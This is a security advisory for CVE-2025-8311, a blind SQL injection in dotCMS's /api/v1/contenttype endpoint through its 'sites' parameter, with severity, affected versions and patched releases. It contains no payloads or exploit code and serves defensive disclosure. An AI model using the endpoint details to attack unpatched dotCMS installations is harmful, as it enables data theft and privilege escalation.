PT-2025-35943 · Dotcms · Dotcms
Matan Sandori
·
Published
2025-09-04
·
Updated
2025-09-04
·
CVE-2025-8311
CVSS v4.0
9.4
Critical
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
dotCMS versions 24.03.22 and after
Description
A Boolean-based blind SQL injection vulnerability exists in the
/api/v1/contenttype endpoint. The endpoint utilizes the sites query parameter, which accepts a comma-separated list of site identifiers or keys. The sites parameter is directly concatenated into a SQL query without proper sanitization, allowing an authenticated attacker with low privileges to extract data from the database, perform privilege escalation, or trigger denial-of-service conditions. Exploitation was verified using tools such as SQLMap, enabling full database exfiltration and potential denial-of-service conditions via crafted payloads.Recommendations
Update to dotCMS version 25.08.14 or later.
Update to dotCMS version 25.07.10-1v2 LTS or later.
Update to dotCMS version 24.12.27v10 LTS or later.
Update to dotCMS version 24.04.24v21 LTS or later.
Exploit
Fix
DoS
LPE
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Dotcms